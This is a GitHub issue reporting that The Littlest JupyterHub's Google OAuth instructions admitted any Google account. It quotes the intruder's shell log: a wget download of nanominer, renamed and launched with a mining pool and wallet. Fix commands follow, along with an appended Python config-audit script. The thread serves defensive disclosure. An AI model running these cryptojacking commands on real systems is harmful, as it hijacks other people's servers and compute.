
The official instructions for Google Auth leave a TLJH installation vulnerable #884

Closed
Bougakov opened this issue Apr 27, 2023 · 5 comments
Labels
bug Something isn't working

Comments

@Bougakov commented Apr 27, 2023

Bug description

I have installed TLJH using the provided manual and enabled Google Auth. Recently, I've discovered that this auth method allows ANYONE with a Google account to access my installation. I found someone with an address [email protected] has managed to access it and install a cryptocurrency miner by running these commands in the terminal:

cat .bash_history 
lscpu
wget https://github.com/nanopool/nanominer/releases/download/v3.7.1/nanominer-linux-3.7.1.tar.gz && tar xvf nanominer-linux-3.7.1.tar.gz && chmod +x nanominer && mv nanominer dontkillme
./dontkillme -algo verushash -pool1 verushash.mine.zergpool.com:3300 -wallet TQ11YB4cti4EhwYkZkoYNwE9B7nkQvTJ86.$(echo $(shuf -i 1-999 -n 1)-TRXKU32CORE) -password c=TRX

Expected behaviour

The manual should be written in a way that the user by default ends up with only allowing a specific set of Google Accounts ([email protected], [email protected]) or Google Apps Domains (@example.com) whitelisted. There must be an explicit action taken by the user to extend the auth permissions to anyone with a Google Account.

Your personal set up

I am using the-littlest-jupyterhub.

tljh-config show
users:
  admin:
  - [email protected]
  - [email protected]
http:
  port: 8888
user_environment:
  default_app: jupyterlab
https:
  port: 8888
auth:
  GoogleOAuthenticator:
    client_id: censored.apps.googleusercontent.com
    client_secret: censored
    oauth_callback_url: https://python.example.com/hub/oauth_callback
  type: oauthenticator.google.GoogleOAuthenticator

I am using Ubuntu on a Digital Ocean droplet.

I am looking for advice on how to restrict access to only Google Workspace accounts from a list of particular domains. Thank you.

@welcome bot commented Apr 27, 2023

Thank you for opening your first issue in this project! Engagement like this is essential for open source projects! 🤗

If you haven't done so already, check out Jupyter's Code of Conduct. Also, please try to follow the issue template as it helps other community members to contribute more effectively.
You can meet the other Jovyans by joining our Discourse forum. There is also an intro thread there where you can stop by and say Hi! 👋

Welcome to the Jupyter community! 🎉

@Bougakov (Author)

I have figured out that I had to manually run these commands:

sudo tljh-config add-item auth.GoogleOAuthenticator.allowed_users [email protected]
sudo tljh-config add-item auth.GoogleOAuthenticator.allowed_users [email protected]

To explicitly restrict access to only these accounts. The manual should be explicit about this - otherwise the security implication is overlooked.

@jrdnbradford (Contributor)

@Bougakov, recently I've been going through the TLJH Google auth docs trying to figure out something similar: how to set up auth for just a few users like you need, and also how to set up Google Group-based auth. I'll be putting in a PR to add some instructions to the Authenticate using Google section of the TLJH docs. I will share here when I'm done.

@jrdnbradford (Contributor) commented May 18, 2023

@Bougakov see #898. The TLJH Google auth docs are now explicit about this and include extra information. It also looks like this default setup may change in the future.

@consideRatio (Member)

In oauthenticator 16 and later, part of tljh 1.0.0 and later, the default is to not allow anyone unless configuration on who to allow is explicitly made.

From https://oauthenticator.readthedocs.io/en/latest/reference/changelog.html:

[All] If no configuration allows a user, then users are no longer allowed by default.
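The config dump from the first comment and the default-deny change quoted above, as an added example that is not code from TLJH, oauthenticator or anyone in this thread: a Python script that parses a `tljh-config show` dump with a hand-written parser for the small YAML subset it prints (so no PyYAML dependency), flags a GoogleOAuthenticator section that has no rule narrowing who may log in, and replays the allow decision for sample logins under both the pre-16 default-allow and the 16+ / TLJH 1.0.0+ default-deny behaviour. The e-mail addresses, the second "restricted" dump and the list of restricting keys are constructed for the example, and `is_allowed` is a stated simplification rather than oauthenticator's own check logic (in particular, treating membership of a `hosted_domain` as an allowance is an assumption to confirm against the docs of the oauthenticator version you run).

```python
"""Audit a `tljh-config show` dump for Google auth that admits any Google account,
then replay the allow decision under pre-16 (default-allow) and oauthenticator
16+ / TLJH 1.0.0+ (default-deny) behaviour. Added example for this thread, not
TLJH or oauthenticator code; the decision model is a simplification that looks
only at allow_all, allowed_users, users.admin and hosted_domain (assumption)."""
from typing import Optional

# Settings that narrow who may log in (assumed list; check your version's docs).
RESTRICTING_KEYS = ("allowed_users", "hosted_domain", "allowed_google_groups")

# Constructed dump modelled on the issue's; e-mail addresses are placeholders.
OPEN_DUMP = """\
users:
  admin:
  - owner@example.com
  - colleague@example.com
auth:
  GoogleOAuthenticator:
    client_id: censored.apps.googleusercontent.com
    client_secret: censored
    oauth_callback_url: https://python.example.com/hub/oauth_callback
  type: oauthenticator.google.GoogleOAuthenticator
"""
# Same dump after `tljh-config add-item auth.GoogleOAuthenticator.allowed_users ...`.
RESTRICTED_DUMP = OPEN_DUMP.replace(
    "  GoogleOAuthenticator:\n",
    "  GoogleOAuthenticator:\n    allowed_users:\n    - owner@example.com\n",
)


def parse_simple_yaml(text: str) -> dict:
    """Parse the subset tljh-config emits: nested mappings, string scalars and
    '- item' lists, which it prints at the same indent as the owning key."""
    root: dict = {}
    frames: list = [(0, root)]        # (indent of the members, container)
    pending: Optional[tuple] = None   # (mapping, key, indent) of a bare "key:"
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        line = raw.strip()
        is_item = line.startswith("- ")
        if pending is not None:       # this line tells us what the bare "key:" holds
            owner, key, key_indent = pending
            pending = None
            if is_item and indent >= key_indent:
                owner[key] = []
                frames.append((indent, owner[key]))
            elif not is_item and indent > key_indent:
                owner[key] = {}
                frames.append((indent, owner[key]))
            else:
                owner[key] = None
        # Leave containers deeper than this line; a list at the same indent is
        # finished too, because "key:" lines never belong to a list.
        while frames[-1][0] > indent or (
            not is_item and isinstance(frames[-1][1], list) and frames[-1][0] >= indent
        ):
            frames.pop()
        container = frames[-1][1]
        if is_item:
            container.append(line[2:].strip())
            continue
        key, _, value = line.partition(":")   # split at the first colon only
        if value.strip():
            container[key.strip()] = value.strip()
        else:
            pending = (container, key.strip(), indent)
    return root


def google_auth_is_open(config: dict) -> bool:
    """True when Google auth has allow_all, or nothing that narrows the allowed
    users; under pre-16 default-allow that is the state this issue reports."""
    auth = config.get("auth") or {}
    if auth.get("type") != "oauthenticator.google.GoogleOAuthenticator":
        return False
    google = auth.get("GoogleOAuthenticator") or {}
    return str(google.get("allow_all")).lower() == "true" or not any(
        google.get(k) for k in RESTRICTING_KEYS
    )


def is_allowed(email: str, config: dict, *, default_allow: bool) -> bool:
    """Simplified allow decision for one login: default_allow=True models
    oauthenticator < 16, default_allow=False models 16+ / TLJH 1.0.0+."""
    google = (config.get("auth") or {}).get("GoogleOAuthenticator") or {}
    admins = (config.get("users") or {}).get("admin") or []
    hosted = google.get("hosted_domain") or []
    hosted = [hosted] if isinstance(hosted, str) else hosted
    if hosted and email.rpartition("@")[2] not in hosted:
        return False                  # hosted_domain rejects other domains outright
    if str(google.get("allow_all")).lower() == "true" or email in admins:
        return True
    if email in (google.get("allowed_users") or []) or hosted:
        return True                   # on the allow-list, or in an accepted Workspace domain
    if any(google.get(k) for k in RESTRICTING_KEYS):
        return False                  # an allow-list exists and this user is not on it
    return default_allow              # no rule at all: the version's default decides


if __name__ == "__main__":
    for label, dump in (("as documented", OPEN_DUMP), ("with allowed_users", RESTRICTED_DUMP)):
        cfg = parse_simple_yaml(dump)
        print(label, "- open to any Google account:", google_auth_is_open(cfg))
        for email in ("owner@example.com", "attacker@gmail.com"):
            print(" ", email, "pre-16:", is_allowed(email, cfg, default_allow=True),
                  "16+:", is_allowed(email, cfg, default_allow=False))
```

To audit a live install, feed the real dump in with `parse_simple_yaml(subprocess.check_output(["tljh-config", "show"], text=True))`; a `True` from `google_auth_is_open` on an oauthenticator release older than 16 is exactly the condition that let the miner operator in, and on 16+ it means nobody can log in until an allow rule is added.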
